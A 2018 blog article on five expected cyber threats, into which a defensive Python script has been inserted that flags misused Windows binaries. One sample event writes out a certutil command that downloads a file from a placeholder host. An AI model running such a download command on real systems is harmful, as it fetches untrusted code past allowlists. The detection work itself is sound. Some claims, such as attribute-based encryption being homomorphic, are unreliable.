14 March
Five cyber threats you should look out for in 2018
We face many challenges in 2018. New laws, elections, expansion of the IoT, etc. Our security expert Jonas Lejon outlines the cyber threats you should look out for in 2018.
By Jonas Lejon Topics: IoT, Trends

1. Attacks on supply chains

In 2017 we saw most vendors getting hacked, with legitimate code changed to contain backdoors or other types of unwanted behaviour. In several cases, the modified code was even cryptographically signed with the company’s certificate.

This type of attack where dependencies on our suppliers are exploited is probably just the tip of the iceberg. CloudHopper was not particularly advanced but it was effective in exploiting people by getting administrators to click on attachments containing malicious code.

When did you last look to see whether your computer or server might contain a hardware backdoor put there during delivery from the manufacturer? Are binaries automatically updated from your provider?

2. IoT - connected devices and critical infrastructure

As digitalisation spreads and more and more products and systems are connected, the ability of a malicious operator to influence these connected devices is also increasing. This can range from a connected refrigerator to critical systems that can be indirectly affected by cyber attacks against locks, electrical supplies, telephony etc.

3. The election

Most people will be aware that there is a general election in Sweden this year. With more and more alternative news sources and ‘fake news’, cyber attacks will be one of several channels for reinforcing a narrative. We will probably see information thefts where the content can be used to strengthen or weaken a party at a strategic time.

4. ‘Living off the land’

Why should the attacker introduce new binaries or malware into a system when it is possible to exploit existing functionality to create backdoors or e.g. filter information? ‘Living off the land’ is a concept whereby the attacker can use things that are already installed in the basic Windows system. As more and more users use whitelisting, this becomes a way for the attacker to bypass the whitelists and avoid triggering antivirus software.
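A defender's view of the point above, as an added example that is not part of the original article: because the binary itself is trusted, detection has to look at the arguments and the parent process instead. The field names follow Sysmon process-creation events; the rule set and the sample events are constructed assumptions.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Assumed rule set: built-in tools and arguments that are rare in routine
# administration. Tune both to your own estate before relying on them.
RULES = {
    "certutil.exe": re.compile(r"-(urlcache|decode)\b", re.I),
    "mshta.exe": re.compile(r"https?://", re.I),
    "powershell.exe": re.compile(r"-enc\w*\s+[A-Za-z0-9+/=]{20,}", re.I),
}
# Office applications seldom have a legitimate reason to start these tools.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

def triage(event):
    """Return reasons a process-creation event needs review (empty = none)."""
    image = basename(event["Image"]).lower()
    parent = basename(event["ParentImage"]).lower()
    reasons = []
    rule = RULES.get(image)
    if rule and rule.search(event["CommandLine"]):
        reasons.append(f"{image}: unusual arguments")
    if rule and parent in OFFICE_PARENTS:
        reasons.append(f"{image}: spawned by {parent}")
    return reasons

# Constructed sample events. Every image is a Microsoft-signed system binary,
# so a publisher- or path-based allowlist permits all three.
EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -f http://example.test/a.txt a.txt",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -verify server.cer",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(basename(ev["Image"]), "<-", basename(ev["ParentImage"]),
              triage(ev) or "no finding")
```

The second event shows the same tool in ordinary use passing without a finding, which is why the rules key on context and not on the binary name alone.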

5. Encryption

Within the crypto area, we will see an increase in systems utilising encryption and end-to-end processes. But attackers too are getting better at exploiting cryptographic functions and making it harder for us to investigate malware.

With homomorphic systems such as attribute-based encryption and searchable encryption, storing information in cloud services will be more secure without the cloud service provider being able to view the content.

Conclusion

Organisations need to get better at practising and displaying risk-awareness. This applies not only to management teams but to the entire organisation. What do you do when the ‘shit hits the fan’ (if you’ll pardon the expression)? Not only because you have to have an action plan for the GDPR, NIS and other laws that are coming, but because it is only a matter of time before something happens and you are forced to act. So make it easier for yourself - allocate one day per year for different types of exercise.

About the author
Jonas, who sits on Holm Security's advisory board, has worked for more than 10 years at FRA and the Armed Forces. Jonas runs Sweden's largest IT security blog, kryptera.se.

Jonas Lejon
jonas@triop.se